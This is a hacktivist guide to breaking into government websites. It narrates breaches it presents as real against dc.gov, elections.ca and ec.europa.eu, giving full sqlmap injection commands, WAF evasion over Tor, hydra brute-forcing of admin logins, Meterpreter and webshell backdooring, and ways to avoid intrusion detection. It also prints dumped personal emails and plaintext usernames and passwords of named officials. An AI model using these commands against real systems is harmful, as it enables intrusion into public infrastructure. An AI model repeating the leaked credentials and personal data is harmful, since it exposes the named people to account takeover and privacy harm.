Targeting Vulnerabilities on State Websites
reciprocal of revolutionary researches against state, capital and police
1E7A 095F AADE 7A90 C21D B657 0A9A 1D98 75AB 60F9
hacking gives the underdog a chance to fight and win
[Hack Back]
Intro
Security of state infrastructure is not impenetrable because many of the service and tech they using cannot be replaced. They will depend on outsourced workforce to improve their service, that would cause bugs and flaws, opening opportunities for their adversary to infiltrate.
Today we will talk about the vulnerabilities that state have left open and continued to do so despise their attempts on improving surface security. Gaining access to the state infra isn’t something difficult because their SOC often don’t have the power to manage and plug every security hole, but maintaining access will be the hard part due to the number of defense inside their infra. We will also briefly talk about that. The reason why such type of vuln is the topic and not phishing or any higher form of advance persistent threat (APT), because not every hacker can pull off a clean APT infiltration, moreover the requirement for running infra to maintain access for C2, bounce, hop box, etc is beyond most hacktivist’s budget, skill and time. This guide is about using what already available to breach their system. Spear-phishing would be great but we will go in-depth about it in future guide.
Tools and Techniques
VM/Live
- Parrot OS : You need a sandboxed environment to perform your operation. Parrot OS is preferred over Kali because of its pre-setup sandbox and Tor mode. Meaning that you can run it as a VM or live and still able to anonymize your connection. When running live, you can configure for encrypted persistent partition to save your results.
Discovery
- Tor Browser : You will require this to inspect content or getting resource for research related to your target(s).
- Zed Attack Proxy : ZAP allows you to live inspect, crawl and intercept site content for web app vulns.
- Burp Suite : Similar to ZAP, both are web app proxy but Burp Suite is needed whenever ZAP failed to discover vuln
- nmap : flagship network scanner to enumerate service, OS and port
- sifter : host OSINT
- photon : another host OSINT
- nikto : web app scanner
- skipfish : automated web app scanner
- wpscan : WordPress scanner
- joomscan : Joomla scanner
- uniscan : multipurpose scanner
- gobuster : directory scanner
- dirble : fast directory scanner
- ATSCAN : multipurpose dork scanner and exploiter
- INURLBR : multipurpose dork scanner and exploiter with over 20 different search engines.
- Ding.rb : lightweight dorker that enumerate quick results
- Bingoo : Bing & Google dorker scanner, while its dork results are usually poor, it can be used to quickly process dork list
- recon-ng : OSINT framework
- whatweb : web app service enumeration tool
- proxychains : proxy tunnel
Exploitation
- sqlmap : SQL injection swiss blade
- atlas : tamper suggester for sqlmap
- bbqsql : Blind SQL injection tool
- fimap : File inclusion tool
- commix : command injection tool
- meterpreter : Metasploit backdoor management
- vulnx : Auto shell injection for CMS like Joomla, WP and Drupal
- hydra : web password cracker
- nekobot: Auto exploiter with 500+ exploit and 2000+ shell
- weevely : basic PHP web shell
- webacoo : Web backdoor cookie script kit
Real Examples
The author believe that sharing real incidents from their history would be better examples to this guide, and will provide brief walkthrough on techniques and tools used in the breaches. Some of these vulns are still exploitable.
2013 - DC.gov
http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887dc.gov is Washington DC government website for DC local administration, note that this is not the site for federal government. The author discovered the SQLi with Ding while searching for .gov vulns.
The ding command used:
$ ruby ding2.rb --dork "inurl:asp?id" --country-code dc.gov --level 3
Or with short flags
$ ruby ding2.rb -d "inurl:asp?id" -c dc.gov -L 3
What it did was to query dork for matching any dc.gov URL with asp?id and to run level 3 that is single quote + blind injection
-L, --level
Level of Tests to Perform with Search
0 => Run Single Quote Injection Test (default)
1 => Run Blind Injection Test
2 => Run /etc/passwd LFI Injection Test
3 => Single Quote + Blind Test
4 => Single Quote + /etc/passwd Test
5 => Perform All TestsWhen the result was parsed and blind injection came back positive, the author plug it into sqlmap and run this command:
$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=BEUS -u "http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887" --batch
What it did was to run sqlmap under Tor and check if Tor correctly ran, then randomize user-agents, use persistent HTTP connection, and skip WAF detection Techniques were B for Blind injection, E for Error-based, U for Union and S for Stack-based injection that ideal for shelling backend database if exploitable.
For the reason of --skip-waf, while having WAF is harder to exploit, it’s not the end of the world because many WAF were misconfigured and easily bypassable with --tamper option in sqlmap. You can also increase --level and --risk for aggressive exploitation. ASP is mainly Microsoft database such as MsSQL and MS Access. If sqlmap did not detect DBMS on default option, you can force it with --dbms like --dbms=mssql or --dbms=access
sqlmap discovered the backend is MsSQL, with Blind, Error and Stacked injection. While dumping database was fun, the author went straight for Stack injection because backdooring the server gain further access to the network. The problem with MsSQL is that you are unlikely have access to neighboring DB unless with DBA privilege, you can use the --is-dba to check if it the DBA.
$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=BEUS -u "http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887" --os-pwn
--os-pwn is to prompt options for OOB shell, Meterpreter or VNC. The problem with OOB shell is it easily detectable, while VNC is unstable on the network if your target connection is weak. The author went with Meterpreter bind shell.
2015 - Elections.ca
http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=Elections.ca is the main Canadian federal election website for voter registration and online voting system. This breach was done one month before 2015 federal election. The vuln was discovered through atscan, enumerated hosts with recon-ng, exploited with sqlmap and login tested with hydra. Like all adventures, the author began to research the target through basic enumeration.
The author used whatweb to enum the type of web app service used on the target:
$ whatweb -v -a 3 elections.ca
The target is ASP.NET which means the back-end is MS Access. Next the author ran atscan dork to scan for vuln:
$ atscan --dork dorks.txt --level 3 --sql --target elections.ca
The dorks.txt contains:
asp?id=
asp?lang=
asp?cat=
aspx?id=
aspx?lang=
aspx?cat=
Results came up positive with Blind injection. Let’s do the sqlmap magic
$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" --batch -p id
This command is bit different from the first example because of multiple parameters so we required to specify one of them using -p flag. Another difference is the techniques reduced to Error and Union because Blind and Stacked injection is very loud and will trigger IDS, which all critical govt infra like election server must have.
The result is vulnerable to Error-based injection. Next we need to dump the table. Note that you cannot enumerate DB like other types in Access, so we need to specify table.
$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" -p id --threads 7 --no-cast --common-tables --unstable
We specified --threads for 7, threads here mean max numbers of connection. --no-cast for disabling casting method, this will increase dumping time and reduce noise queried if blocked by IDS/WAF. --common-tables to enumerate for known table list that sqlmap have, you can use custom list when it prompts you during the operation. --unstable to adjust option if connection was unstable. We also removed --batch to manually select options.
The user table came up. We need to dump it so we specify --dump and -T for target table
$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" -p id --threads 7 --no-cast --T Users --dump
When the hashes dumped, sqlmap will ask you if you want to crack the password, you can crack it with default wordlist or custom. hashes.org has massive pre-cracked wordlists in plaintext that you can download, or you can use the password list from seclists in Parrot OS, recommended the probable list. Once you got the passwords in plaintext you can grep it out into passwords.txt, and also grep out the username into logins.txt
Once we got the login we need to find the admin page. Problem that using anything like dirbuster is very loud and definitely trigger SOC investigation so we need something super low-key. At the time there is a new host enumeration technique came out by using certificate transparancy or CT to get all hosts with HTTPS enabled on same CA. And recon-ng had a module added in the tool.
(Note: because Recon-ng went through several confusing CLI overhauls for the past 5 years, the author decided to stick to latest options)
Once recon-ng launched, you need to load the CT module, set target and run with these options:
modules load certificate_transparency
options set source elections.ca
run
It will parse something like this
------------
ELECTIONS.CA
------------
[*] Country: None
[*] Host: evault.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: evaults1.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: certauth.sts.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: enterpriseregistration.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
-------
SUMMARY
-------Extract the hosts into hosts.txt. All the admin pages are:
admin.elections.ca
admin.preprod.elections.ca
admin.test.elections.ca
cce-admin.elections.ca
selection-admin.elections.ca
tapadmin.preprod.elections.ca
tapadminapp.preprod.elections.ca
www.selection-admin.elections.ca
We need to test all logins but time is running out and we can’t do it manually. So we test all the logins with hydra against the admin list with this command:
$ hydra -L logins.txt -P passwords.txt -M hosts.txt http-post-form "/login.asp:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
Once hydra is finished, we can use the correct logins from Tor Browser and find the image upload form to backdoor with an ASP webshell from webshells collection of BlackArch git repository. While you cannot upload plain ASP shell, what you can do is to inject image header into the header webshell file and mask it as an image file.
One you get shell up, you can test it out by going to it with something like elections.ca/shell.asp and test command whoami
Unfortunately, the author only got this far because while they attempted to backdoor the server with a bind shell the breach was discovered and the SQLi vuln was quickly closed by the SOC. While the webshell still up at the time, the author halted any attempt to access the server and cleaned house.
2019 - ec.europa.eu
http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15%27This last guide will feature real log of the breach
EC.Europa.eu is the main website of European Commission, the executive branch of the European Union. The author used ding to discover vulns and exploited with sqlmap.
Like all fun camping trips, the author begin with a dork scanner. To scan for the target:
$ ruby ding2.rb -d "inurl:cfm?id" -c ec.europa.eu --level 3
When the target output we can use sqlmap to inject
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=EB --no-cast --tor --check-tor --batch --threads 5
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=15 AND 7941=7941
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: id=15 AND 3301=CTXSYS.DRITHSX.SN(3301,(CHR(113)||CHR(112)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3301=3301) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)))
---
web application technology: Apache 2.2.29
back-end DBMS: Oracle$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 --dbs
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] PATROL_SETUP
[*] REGADMIN
[*] SYS
[*] SYSTEM
[*] XDB$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 --tables
Database: EXFSYS
[1 table]
+------------------------------+
| RLM$PARSEDCOND |
+------------------------------+
Database: XDB
[2 tables]
+------------------------------+
| XDB$IMPORT_TT_INFO |
| XDB$XIDX_IMP_T |
+------------------------------+
Database: SYSTEM
[4 tables]
+------------------------------+
| HELP |
| OL$ |
| OL$HINTS |
| OL$NODES |
+------------------------------+
Database: SYS
[26 tables]
+------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| DATA_PUMP_XPL_TABLE$ |
| HS$_PARALLEL_METADATA |
| HS_BULKLOAD_VIEW_OBJ |
| HS_PARTITION_COL_NAME |
| HS_PARTITION_COL_TYPE |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| KU$XKTFBUE |
| KU$_DATAPUMP_MASTER_10_1 |
| KU$_DATAPUMP_MASTER_11_1 |
| KU$_DATAPUMP_MASTER_11_1_0_7 |
| KU$_DATAPUMP_MASTER_11_2 |
| KU$_LIST_FILTER_TEMP |
| KU$_LIST_FILTER_TEMP_2 |
| ODCI_PMO_ROWIDS$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
| WRR$_REPLAY_CALL_FILTER |
+------------------------------+
Database: PATROL_SETUP
[1 table]
+------------------------------+
| P$POK_CFG |
+------------------------------+
Database: REGADMIN
[256 tables]
+------------------------------+
| ARCHIVE |
| BELUGA_FUNDS |
| BELUGA_REGIONS |
| BELUGA_THEMES |
| CAMPAIGN_PROJECTS |
| CCT |
| CPGM |
| FIN |
| FON |
| FONT |
| GRP |
| GW |
| GWF |
| IFR_BEN_FUNDS |
| IFR_BEN_IDENTIFICATION |
| IFR_BEN_LINKS |
| IFR_BEN_PRIORFUND |
| IFR_BEN_PRIORITIES |
| IFR_BEN_PRIORITIES_ML |
| IFR_BEN_THEMATIC |
| IFR_BEN_THEMATIC_ML |
| IFR_BLOGS |
| IFR_BLOGS_RATING |
| IFR_COUNTRY |
| IFR_DOCUMENTS |
| IFR_DOCUMENTS_ANNEXE |
| IFR_DOCUMENTS_ML |
| IFR_DOCUMENT_ANNEXE_ML |
| IFR_DOCUMENT_TYPES |
| IFR_DOC_COUNTRIES |
| IFR_DOC_FUNDS |
| IFR_DOC_POLICIES |
| IFR_DOC_THEMES |
| IFR_DOC_THEMOBJ |
| IFR_EVALSEDLIB |
| IFR_EVALSEDLIB_TRANS |
| IFR_EVALSED_COUNTRIES |
| IFR_EVALSED_THEMES |
| IFR_EVALSED_TYPES |
| IFR_FUND_INSTR |
| IFR_GALLERY |
| IFR_GP_CONTACTS |
| IFR_GP_CONTACT_MAIN |
| IFR_GP_COUNTRIES |
| IFR_GP_COUNTRIES_MAIN |
| IFR_GP_IMPACT_OBJ |
| IFR_GP_IPO_MAIN |
| IFR_GP_MAIN |
| IFR_GP_SH_MAIN |
| IFR_GP_STAKEHOLDERS |
| IFR_GP_THEMES |
| IFR_INFORM_EVENTS |
| IFR_LOCAL_EVENTS |
| IFR_NEWSROOM |
| IFR_NEWSROOM_COUNTRIES |
| IFR_NEWSROOM_THEMES |
| IFR_NEWSROOM_THEMOBJ |
| IFR_NEWSROOM_TRANS |
| IFR_NEWSROOM_TYPES |
| IFR_NEWSROOM_WEBSITES |
| IFR_ORGANISATION_CATEGORY |
| IFR_POLICY_SPEC |
| IFR_PUBLICATIONS |
| IFR_PUBLICATIONS_EMAIL |
| IFR_PUBLICATION_SUBTHEMES |
| IFR_PUBLICATION_THEMES |
| IFR_REGIOSTARS |
| IFR_REGIOSTARS_RATING |
| IFR_ROLES |
| IFR_SECTION |
| IFR_TENDERS |
| IFR_TENDERS_COR |
| IFR_TENDERS_ML |
| IFR_TESTIMONIALS |
| IFR_THEMES |
| IFR_THEMES_WEBSITES |
| IFR_TOOLS_USERS |
| IFR_TOOLS_USERS_COUNTRY |
| IFR_TRANS_KEYS |
| IFR_TRANS_VALUES |
| IFR_TYPES |
| IFR_TYPES_WEBSITES |
| IFR_TYPE_SECTION |
| IFR_UNI_ORDER |
| IFR_UNI_TESTIMONIAL |
| IFR_USER_ROLES |
| IFR_USER_WEBSITES |
| IFR_WEBSITES |
| IMG |
| IMGT |
| INFORM_WHO |
| INFORM_WHO_COUNTRY |
| LG |
| LINKS |
| LNK |
| LPGM |
| LSTO |
| N_LANG |
| N_NEWS |
| OBJ |
| PAY |
| PGM |
| PGT |
| PLAN_TABLE |
| PREG |
| PSTO |
| PTHE |
| REG |
| SPGM |
| SPGMT |
| SREG |
| STO |
| STT |
| STY |
| TBL_AUDITTRAIL |
| TBL_BREADCRUMBS |
| TBL_CITIES |
| TBL_CITYREGIONS |
| TBL_CITY_ML |
| TBL_CONTACTGW |
| TBL_CONTACTLINKS |
| TBL_CONTACTPERSONS |
| TBL_CONTACTROLE |
| TBL_CONTACTS |
| TBL_CONTACTTYPE |
| TBL_COUNTRIES |
| TBL_COUNTRY_ML |
| TBL_CPTO |
| TBL_CPTO_ML |
| TBL_EVAL_EVENTS |
| TBL_EVENTS |
| TBL_EVENT_THEMES |
| TBL_EVENT_THEME_ML |
| TBL_EVENT_USERS |
| TBL_EXCEL_LANG_COLUMNS |
| TBL_EXCEL_TRANSKEY_MAPPING |
| TBL_FILEBIN |
| TBL_FILES |
| TBL_FILES_ML |
| TBL_FINBREAKDOWNS |
| TBL_FINBREAKDOWN_ML |
| TBL_FORMS |
| TBL_FORM_ML |
| TBL_FO_SYSTEM |
| TBL_FUNDS |
| TBL_FUND_ML |
| TBL_GATEWAYS |
| TBL_GATEWAY_ML |
| TBL_GEOCOORDINATES |
| TBL_HTMLBIN |
| TBL_IMAGEBIN |
| TBL_IMAGECATEGORIES |
| TBL_IMAGELOCATION |
| TBL_IMAGES |
| TBL_IMAGESIZE |
| TBL_IMAGE_ML |
| TBL_LANGUAGES |
| TBL_LINKS |
| TBL_LINKTYPES |
| TBL_LINK_ML |
| TBL_OBJECTIVES |
| TBL_OBJECTIVE_ML |
| TBL_ONLINEHELP |
| TBL_OP |
| TBL_OP_REGIONS |
| TBL_OP_TEMP |
| TBL_OP_TEMP_TEST |
| TBL_OP_TRANS |
| TBL_PERIODS |
| TBL_PRIORFINBREAKDWN |
| TBL_PRIORITY |
| TBL_PRIORITY_ML |
| TBL_PROGRAMCONTACTS |
| TBL_PROGRAMCPTOS |
| TBL_PROGRAMFUNDS |
| TBL_PROGRAMGW |
| TBL_PROGRAMLINKS |
| TBL_PROGRAMMAP |
| TBL_PROGRAMMEDECISION |
| TBL_PROGRAMMES |
| TBL_PROGRAMPRIMARYFUNDS |
| TBL_PROGRAMPRIORITIES |
| TBL_PROGRAMREGIONS |
| TBL_PROGRAMTHEMES |
| TBL_PROGRAMTYPES |
| TBL_PROGRAM_ML |
| TBL_PROJECTBATCHUPLOADFILES |
| TBL_PROJECTCONTACTS |
| TBL_PROJECTCPTOS |
| TBL_PROJECTFILES_ML |
| TBL_PROJECTFUNDS |
| TBL_PROJECTGENERAL_ML |
| TBL_PROJECTGW |
| TBL_PROJECTLINKS |
| TBL_PROJECTMAGES |
| TBL_PROJECTMAP |
| TBL_PROJECTPROGRAMMES |
| TBL_PROJECTREGIONS |
| TBL_PROJECTS |
| TBL_PROJECTSOCIALSERVICE |
| TBL_PROJECTS_TEMP |
| TBL_PROJECTTHEMES |
| TBL_PROJECT_ML |
| TBL_PROJECT_SELECTD |
| TBL_REGIONS |
| TBL_SCOPEPARTS |
| TBL_SCOPETEMPLATES_ML |
| TBL_SERVICES |
| TBL_SOCIALSERVICE |
| TBL_SYSTEM |
| TBL_TEMP |
| TBL_TEMP_P |
| TBL_THEMES |
| TBL_THEMETYPE |
| TBL_THEME_ML |
| TBL_TRANSLATIONS |
| TBL_USERCOUNTRIES |
| TBL_USERROLEGROUPS |
| TBL_USERROLES |
| TBL_USERROLESERVICES |
| TBL_USERS |
| TSTO |
| T_COM |
| T_LANG |
| T_LINK |
| T_NEWS |
| T_PAY |
| T_PERSON |
| T_PERSON_OS |
| T_PERSON_OS_TMP |
| T_PICTURE |
| T_TEST |
| T_TIME |
| T_WORKSHOP |
| URL |
| VD_CATEGORIES |
| VD_COUNTRIES_VIDEO |
| VD_THEMES |
| VD_THEMES_VIDEO |
| VD_THEME_ML |
| VD_THEMOBJ_VIDEO |
| VD_USERS |
| VD_VIDEOS |
| VD_VIDEO_ML |
| V_INFOREGIO_OP_AUTHORITY |
| V_INFOREGIO_OP_LIST |
| V_INFOREGIO_OP_PRIO_AXIS |
| V_INFOREGIO_OP_REGIONS |
| V_INFOREGIO_OP_THEM_OBJ |
| WEB_GLOSSARY |
| WEB_GLOSSARY_ESCAPE |
| WEB_GLOSSARY_COPY |
| WEB_STRUCTURE |
| WEB_TEMP_VIDEOS |
| WEB_TEMP_VIDEOS_X |
| WEB_TRANSLATIONS |
+------------------------------+
Database: CTXSYS
[5 tables]
+------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+------------------------------+$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T T_PERSON --columns
Database: REGADMIN
Table: T_PERSON
[13 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CITY | VARCHAR2 |
| COUNTRY | VARCHAR2 |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| FNAME | VARCHAR2 |
| GENDER | VARCHAR2 |
| ID_PERSON | NUMBER |
| LNAME | VARCHAR2 |
| NUM | VARCHAR2 |
| ORGANISATION | VARCHAR2 |
| PHONE | VARCHAR2 |
| STREET | VARCHAR2 |
| ZIP | VARCHAR2 |
+--------------+----------+$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T T_PERSON -C EMAIL --dump
back-end DBMS: Oracle
Database: REGADMIN
Table: T_PERSON
[62 entries]
+----------------------------------------+
| EMAIL |
+----------------------------------------+
| emyr.roberts@wales.gsi.gov.uk |
| chrismal@mou.gr |
| janmaarten_devet@ecotec.com |
| gelderbrand.gosw@go-regions.gsi.gov.uk |
| jlongden.gosw@go-regions.gsi.gov.uk |
| kadlecova.z@kr-ustecky.cz |
| m.dimitrova@ipaei.government.bg |
+----------------------------------------+
(Note: there was much more emails dumped but author didn't want to clutter up this post)$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T VD_USERS,TBL_USERS --dump
Database: REGADMIN
Table: VD_USERS
[2 entries]
+-------------+------------+
| LOGIN | PWD |
+-------------+------------+
| video_admin | zxcv5678F |
| videoadmin | videoadmin |
+-------------+------------+
Table: TBL_USERS
[10 entries]
+--------+----------+------------+----------+------------+--------------------------------+--------+---------+-------------------------------+---------+--------------+--------------+----------------+-------------------------+-----------+-----------------+------------------------------+-----------------------------------+
| USERID | PERIODID | USERROLEID | FAX | PHONE | EMAIL | LOCKED | MOBILE | ADDRESS | EXPIRED | USERNAME | LASTNAME | PASSWORD | FIRSTNAME | LASTLOGIN | GENERICPASSWORD | ORGANISATIONNAME | ORGANISATIONADDRESS |
+--------+----------+------------+----------+------------+--------------------------------+--------+---------+-------------------------------+---------+--------------+--------------+----------------+-------------------------+-----------+-----------------+------------------------------+-----------------------------------+
| 113 | 23 | 15 | | | Simone.PALUDO@ext.ec.europa.eu | 0 | | | 0 | simone | Paludo | wiki123 | Simone | 08-11-17 | 0 | Regio | |
| 9 | 1 | 1 | 34566345 | 1234565676 | previous@inforegio.com | 1 | 4564656 | previousPeriodCreator Address | 1 | previousUser | previousUser | previousUser12 | Previous Period Creator | 15-08-07 | 0 | previousPeriodCreator OrgNUm | previousPeriodCreator Org Address |
| 10 | 23 | 5 | | | regio-webmaster@ec.europa.eu | 0 | | | 0 | technical | Manager | tm123 | Technical | 15-03-19 | 0 | DG REGIO | |
| 36 | 23 | 5 | | | webteam@mostra.com | 0 | | | 0 | webteam | Team | M0str4U | Web | 26-05-15 | 0 | MOSTRA | |
| 101 | 23 | 15 | | | mostra@mostra.be | 1 | | | 1 | editor | standard | Mostra123 | user | 04-07-12 | 0 | Mostra | |
| 45 | 23 | 5 | | | webteam@mostra.com | 0 | | | 0 | Maintenance | Mostra | Maintenance123 | Maintenance | 06-02-12 | 1 | Mostra | |
| 102 | 23 | 5 | | | webadmin@mostra.com | 0 | | | 0 | moadmin | moadmin | QV5EwBy5 | moadmin | 16-03-16 | 0 | Mostra | |
| 111 | 23 | 8 | | | corinne.wenner@ec.europa.eu | 0 | | | 0 | Coco | Wenner | Wenner02 | Corinne | 26-07-13 | 0 | DG REGIO | |
| 114 | 23 | 5 | | | Guy.Vaerman@esn.eu | 0 | | | 0 | esnadmin | Vaerman | esnadmin123 | Guy | 18-04-19 | 0 | ESN | |
| 115 | 23 | 8 | | | anne.verbist@ec.europa.eu | 0 | | | 0 | Anne | Verbist | Verbist18 | Anne | 27-03-18 | 1 | REGIO | |
+--------+----------+------------+----------+------------+--------------------------------+--------+---------+-------------------------------+---------+--------------+--------------+----------------+-------------------------+-----------+-----------------+------------------------------+-----------------------------------+The author then used --dump-all flag to completely dump the databases
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 10 --dump-all
However, because the author couldn’t find the admin page at the time, they seek help from a very wise Sabo-Tabby for assistance.
Back to the target, the author then whipped out CT from recon-ng, exported the host list and grepped out the logins
de-mw-eulogin.tech.ec.europa.eu
secureadmin.enterprise-europe-network.ec.europa.eu
vpn-bx.ec.europa.eu
vpn-lu.ec.europa.eu
vpn.ec.europa.euEnd Words
The art of exploitation did not come from some college or institution. It comes from your persistence, perseverance, the thirst for curiosity and resistance against state and capital.
The power is in your hands, you can unschool and hack at the same time, start anywhere. Hack for the power of people.
When we speak truth to power we are ignored at best and brutally suppressed at worst
[Jeremy Hammond]